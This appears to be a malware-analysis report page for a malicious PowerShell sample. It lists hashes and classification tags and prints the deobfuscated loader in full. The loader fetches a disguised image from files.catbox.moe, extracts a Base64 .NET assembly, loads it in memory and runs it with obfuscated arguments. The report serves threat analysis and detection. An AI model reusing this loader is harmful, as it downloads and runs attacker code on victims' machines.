Malicious

2e6e2f37187fc0cf8ac73501b02a613b

PowerShell | MD5: 2e6e2f37187fc0cf8ac73501b02a613b | Size: 20.28 KB | application/x-powershell

PowerShell | Powershell: Hidden Execution | Contains Base64 Block | Base64 Block | DeObfuscated

Characteristics
MD5: 2e6e2f37187fc0cf8ac73501b02a613b
Sha1: 8931c4cba2ff3bd29281ee86ddb3f62772d63149
Sha256: ace00c4aa0c763c44c1821d87307262587d88aa3446bbff35c8816eb4a340623
Sha384: aa8dbd309ce349e28d635753681be50413bbe08495b85b8dad136cdc454df86fd5b589efdb0b83ae7358210d5c417f18
Sha512: 0f7ebdeec48cdbdc0f4d0a26a7d8f4aaaad4833a233115cff5df2197e8b45619f9b653058a836fa4d1b9a094e672a6486d793e12322607928c407a14391ffe76
SSDeep: 384:pjtP2z+UZX6qkPmgAAGUQLiYtq3jgPoI74s/xz5+xpe2ibYWIDajrUmFyjF8Kbgg:pjR2z+UZXzkRAAGUQLiYw3j+rUmFyjFF
TLSH: 34920D4E5D03043289332F3E5F17544AEF6B052789298A40BFCCCAA5AFB565183B9F6D
File Structure
2e6e2f37187fc0cf8ac73501b02a613b | PowerShell | Powershell: Hidden Execution | Contains Base64 Block | Base64 Block | DeObfuscated | Malicious
[PowerShell Command] | PowerShell | DeObfuscated | Malicious
[Deobfuscated PS] | DeObfuscated | PowerShell | Malicious
[Base64-Block] | Base64 Block | PowerShell | DeObfuscated | Malicious
[Deobfuscated PS] | DeObfuscated | PowerShell | Malicious
Artefacts
Deobfuscated PowerShell:

$null = ([Encoding]::"ASCII"."GetString"((Invoke-WebRequest "https://files.catbox.moe/hejh36.jpg" -UseBasicParsing)."Content") -match "BaseStart-(.*?)-BaseEnd")
$valor = $matches[1]
$assembly = [Assembly]::"Load"([Convert]::"FromBase64String"($valor))
$olinia = "=kzNihjZxIDOxkzMy0yM5QGOtEDMzQTLlJ2M50SMzUDNzQzYm1jblt2b0ZSYpRWZt1DdsF2P0hHdukXe55Wa69ybvAHch5SZnFmcvR3clNXYiVmcpZmL2IzMkJWL0NWZq9mcw9iYvAjdv02bj5ycpBXYlx2Zv92ZuU2ZhJ3b0NXZzFmYlJXam9yL6MHc0RHa"
$type = $assembly."GetType"("ClassLibrary1.Home")
$method = $type."GetMethod"("VAI")
$method."Invoke"($null, [object[]] @({ @($olinia, "", "", "", "MSBuild", "", "", "", "", "C:\Users\Public\Downloads", "bifanged", "js", "", "", "lotong", "2", "") } ))
